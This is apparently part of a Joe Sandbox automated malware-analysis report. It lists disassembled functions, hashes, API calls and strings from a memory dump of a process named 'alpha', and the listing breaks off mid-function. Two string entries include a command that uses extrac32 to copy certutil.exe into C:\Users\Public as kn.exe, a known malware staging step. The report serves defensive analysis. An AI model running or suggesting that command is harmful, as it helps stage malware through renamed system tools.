                                              • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                              • Instruction Fuzzy Hash: 0A71B6336086818AE7618F15F4403F9B6A0FB4EB79F544234DA5E827A4DF3ED549CB06
                                              Function 00007FF6EB1993E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                              • String ID:
                                              • API String ID: 3829876242-3916222277
                                              • Opcode ID: 4f22813eede9613b07e2ee34b1665593af95064faf104fdc635e57dc54895536
                                              • Instruction ID: 7466e4f7777947a5a14b25700c278e1062f17cadc73bbdb9a79fddf36565dae5
                                              • Opcode Fuzzy Hash: 4f22813eede9613b07e2ee34b1665593af95064faf104fdc635e57dc54895536
                                              • Instruction Fuzzy Hash: 21618433A0468286E6159B11E5143BAB7A1FF8DBA8F448135DE0E877A4DF3EE9058B05
                                              Function 00007FF6EB1A1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                              • String ID: CSVFS$NTFS$REFS
                                              • API String ID: 3510147486-2605508654
                                              • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                              • Instruction ID: 3d8c97ff4d1e2f84941e7075066c01bb151cb5ffc7a41325775864d230153bc3
                                              • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                              • Instruction Fuzzy Hash: 34615233704BC28AEB618F21E8443E977A4FB49B99F444135DA0D8B768DF79E248CB05
                                              Function 00007FF6EB1772B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                              Download Yara Rule
                                              APIs
                                              • longjmp.MSVCRT(?,00000000,00000000,00007FF6EB177279,?,?,?,?,?,00007FF6EB17BFA9), ref: 00007FF6EB194485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: longjmp
                                              • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                              • API String ID: 1832741078-366822981
                                              • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                              • Instruction ID: 603a76ce1fc0c5f241a4ba8a71881d929911c2ea43dd6ae7e394f454123b65bc
                                              • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                              • Instruction Fuzzy Hash: F5C18C67F0C6D281E638DB56A1507F82791AB4EBACF900036DD0DD36B1CF6EA545834A
                                              Function 00007FF6EB17B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heapwcschr$AllocateProcessmemset
                                              • String ID: -$:.\$=,;$=,;+/[] "
                                              • API String ID: 2060774286-969133440
                                              • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                              • Instruction ID: 90d84f21cc32d591300d31822ad905fd22767ffd05d525c724d7ff425090659d
                                              • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                              • Instruction Fuzzy Hash: 25B1D423A0C66281EA608B15E1943FA6690FF4EBA8F454131CE5EC37F4CF7EE445870A
                                              Function 00007FF6EB17FC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                              • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                              • API String ID: 1606811317-2340392073
                                              • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                              • Instruction ID: 835308ffc3e331290f9734911623bebd1f7d1ce97f7004a820798041287b80e1
                                              • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                              • Instruction Fuzzy Hash: 74D1A023A08B9281E6118B15E8443F967A0FF4A7B8F544135DA9D937F9DF3EE405C70A
                                              Function 00007FF6EB1A03AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$ErrorLast$InformationVolume
                                              • String ID: %04X-%04X$~
                                              • API String ID: 2748242238-2468825380
                                              • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                              • Instruction ID: 4ab8217f81740f3186004c5d79c4f15fd0339335c26692a4c2896b950306b0d0
                                              • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                              • Instruction Fuzzy Hash: 99A19463708BC28AEB258F21D8543E977A1FB89798F404035D94D8B7A8DF3DE6498B01
                                              Function 00007FF6EB18662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                              • String ID: +-~!$APerformUnaryOperation: '%c'
                                              • API String ID: 2348642995-441775793
                                              • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                              • Instruction ID: 4fb8e6a230c8374e6cee95c301e02d1bb9b528769717cb457ea15f7e7011e783
                                              • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                              • Instruction Fuzzy Hash: 5D718063D08A86C5E7604F61E4103BD77A1FB4DBA8F54C031DA4E862A8EF3EA484C756
                                              Function 00007FF6EB179400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                              • String ID: FAT$~
                                              • API String ID: 2238823677-1832570214
                                              • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                              • Instruction ID: 1b9f6a274223911609e89bebc3db12c167d7d362ef43a10ad0d91b09f204ad46
                                              • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                              • Instruction Fuzzy Hash: 20718F33608BC18AEB61CF21D8503EA77A4FB4A799F404135DA4D8BB68DF39D249CB05
                                              Function 00007FF6EB17D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D884
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D89D
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D94D
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D964
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB17DB89
                                              • wcstol.MSVCRT ref: 00007FF6EB17DBDF
                                              • wcstol.MSVCRT ref: 00007FF6EB17DC63
                                              • memmove.MSVCRT ref: 00007FF6EB17DD33
                                              • memmove.MSVCRT ref: 00007FF6EB17DE9A
                                              • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17DF1F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                              • String ID:
                                              • API String ID: 1051989028-0
                                              • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                              • Instruction ID: fd5e218cc736c01176c38da9c780b78f46bf57c2b01e293d6ce791817e98fa58
                                              • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                              • Instruction Fuzzy Hash: D10293B3A0C75981EA209F14E4403B976A1FB8EBA8F544135DA8D937E4DFBEE041C709
                                              Function 00007FF6EB1786B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$_wcsicmp$AllocProcess
                                              • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                              • API String ID: 3223794493-3086019870
                                              • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                              • Instruction ID: c63fc7a51b6e876bf093b78b404274974c4dbaa7283ffc5fc01cd06892352b28
                                              • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                              • Instruction Fuzzy Hash: E3518F23A08A42C6EB158B15E4503F97BA1FB4EBA8F584134C91E873B4DF7EE445C71A
                                              Function 00007FF6EB182B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                              • API String ID: 0-3124875276
                                              • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                              • Instruction ID: 9c611f5caeab65f055414132ba03f641f3da6a75506b94537e7462cbd08bb736
                                              • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                              • Instruction Fuzzy Hash: 4D516D22A0C64382F7159F21A4143F97AA1BF4DBADF445135DA4EC62B4DF3EA409878B
                                              Function 00007FF6EB19BFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB1858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6EB19C6DB), ref: 00007FF6EB1858EF
                                                • Part of subcall function 00007FF6EB18081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB18084E
                                              • towupper.MSVCRT ref: 00007FF6EB19C1C9
                                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB19C31C
                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF6EB19C5CB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                              • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                              • API String ID: 2242554020-619615743
                                              • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                              • Instruction ID: 47d8aee8119f689f0d92b522beaffd5b599f0b59cdbbaaef9eee4e62588d56d7
                                              • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                              • Instruction Fuzzy Hash: C312C523A0869281EA249B15A4443FA67A0FF4DBB8F544235D9DE837F4DF3EE541C70A
                                              Function 00007FF6EB186FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                              • String ID: \\.\
                                              • API String ID: 799470305-2900601889
                                              • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                              • Instruction ID: c921b16e3b583b01f8a1ae33f6fe78510b67b411945271d4a11eab010e8593f6
                                              • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                              • Instruction Fuzzy Hash: 8B51A033A08B82C5EB618F20E8013F967A0FB8DBA8F495535DA4E87BA4DF3DD5458705
                                              Function 00007FF6EB178B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                              • String ID:
                                              • API String ID: 1944892715-0
                                              • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                              • Instruction ID: f2092faddc1625b93311e241ef154c6c1914ecd13368dbc7987ab56f4d6cdf95
                                              • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                              • Instruction Fuzzy Hash: A5B1A463A09642C6EA619F12E4543F966A1FF4EBA8F444035CA4EC73F1DF7EE444870A
                                              Function 00007FF6EB175458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1754DE
                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB17552B
                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB17554F
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB19345F
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB19347E
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB1934C3
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1934DB
